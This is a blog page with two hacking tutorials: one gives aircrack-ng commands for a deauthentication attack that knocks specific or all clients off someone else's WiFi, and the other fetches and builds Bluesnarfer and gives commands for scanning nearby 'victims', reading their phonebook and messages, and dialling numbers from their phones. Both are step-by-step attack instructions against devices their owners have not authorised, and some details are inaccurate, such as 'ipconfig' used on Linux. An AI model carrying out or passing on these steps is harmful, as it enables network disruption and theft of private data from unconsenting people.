Please Click and Help Us get a domain...

Showing posts with label Wireless Hacking. Show all posts
Showing posts with label Wireless Hacking. Show all posts

Tuesday, December 8, 2015

Disconnect Anyone From His Own Wifi Without password.

Disconnect Anyone From His Own Wifi Without password.



Hello , hacker welcome to techproupdate today i have something good to tell you,you may heard many times that someone disconnect client from wifi without knowing his or her wifi password so if you wonder how does they do it,read this article...

Requirement for this trick.
Linux - Download
Aircrack-ng - Download

Steps to Disconnect Anyone From His Own Wifi Without Password

Step:1 - launch aircrack-ng type “airmon-ng” in terminal).

Step:2 - turn on monitor mode in your wireless card by typing “airmon-ng start wlan0) wlan0 should be your wireless interface (check your interface by typing “iwconfig in another terminal ).

Step:3 - as now your wireless card is in monitor mode it can be use to search wireless AP around you, so to see AP around you type “airodump-ng mon0” mon0 is your interface .

Step:3 - now choose wifi of which you want to disconnect client and copy its BSSID.And to focus on your particular target type airodump-ng -c (channel of your target AP) –bssid (BSSID of your Target AP) mon0.

Step:4 - take down his client by typing “aireplay-ng –deauth 10 -a (BSSID of your target AP) -c (MAC address of the client to be deauthenticated) mon0”

–deauth : number of deauthorization packet to be send, like we take 10 in this example above.

After this command “aireplay-ng –deauth 10 -a (BSSID of your target AP) -c (MAC address of the client to be deauthenticated) mon0” this particular client will disconnect from your target wifi .

Or if you want to take down all the connected client from your target wifi

then type : aireplay-ng –deauth 1000 -a (BSSID of your taget) -h (your mac address ) mon0. this command disconnect all the connected clients from target wifi.

To find your mac address open terminal and type “ipconfig”

This attack was known as :
Deauthentication Attack
Usage Tips
It is usually more effective to target a specific station using the -c parameter.

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them....

please can you help us get a domain.. (Click our Ads in here.. please do this for get a domain...)

Wednesday, October 14, 2015

How To Hack Phones With Bluetooth Using Backtrack (BT5/Kali Linux)

A brief tutorial on how to hack a phone via bluetooth using Bluesnarfer.

[Image: Ola4nby.png]

For Backtrack/Kali Linux :

First we must install Bluesnarfer 

Make your way to the opt directory


Code:
cd /opt

Get Bluesnarfer using the wget command
Code:
/opt# wget http://alighieri.org/tools/bluesnarfer.tar.gz

Reopen the directory using the ls command and you will see Bluesnarfer in there, now we have to extract it.
Code:
:/opt# ls
bluesnarfer.tar.gz  firmware-mod-kit  metasploit  Teeth

To extract we use the simple tar xvf command
Code:
/opt# tar xvf bluesnarfer.tar.gz

Reopen the directory once again and you will see Bluesnarfer there
Code:
/opt# ls
BFi13-dev-18  bluesnarfer.tar.gz  metasploit
bluesnarfer   firmware-mod-kit    Teeth

Lets enter that folder like so
Code:
/opt# cd bluesnarfer

Code:
/opt/bluesnarfer# ls
include  Makefile  README  src

Now we finish it off by compoling the install like this
Code:
/opt/bluesnarfer# make

To see all of the Bluesnarfer commands run this command ./bluesnarfer
Code:
:/opt/bluesnarfer# ./bluesnarfer

Now that we have Bluesnarfer, you must configure rfcomm first, if you havent already done that,
Code:
mkdir -p /dev/bluetooth/rfcomm

Code:
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

Code:
mknod --mode=666 /dev/rfcomm0 c 216 0

Code:
hciconfig -i hci0 up

Code:
hciconfig hci0

(Scan for victims)
Code:
hcitool scan hci0

(ping the vitcim to see if he is awake)
Code:
l2ping  < victim mac addr>

(browse the victim for rfcomm channels to connect to)
Code:
sdptool browse --tree --l2cap < mac addr >

(then you can use bluesnarfer for example to read the victims phonebook, dial a number or read Sms or other things.)
Code:
Bluesnarfer -r 1-100 -C 7 -b < mac addr >

(to see available opions to do )
Code:
bluebugger -h

(Dial number )
Code:
bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >

Extra: This is what the Bluesnarfer shell should look like
Code:
bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr

ATCMD     : valid AT+CMD (GSM EXTENSION)

TYPE      : valid phonebook type ..
example   : "DC" (dialed call list)
      "SM" (SIM phonebook)
      "RC" (recevied call list)
      "XX" much more

-b bdaddr : bluetooth device address
-C chan   : bluetooth rfcomm channel

-c ATCMD  : custom action
-r N-M    : read phonebook entry N to M
-w N-M    : delete phonebook entry N to M
-f name   : search "name" in phonebook address
-s TYPE   : select phonebook memory storage
-l      : list aviable phonebook memory storage
-i      : device info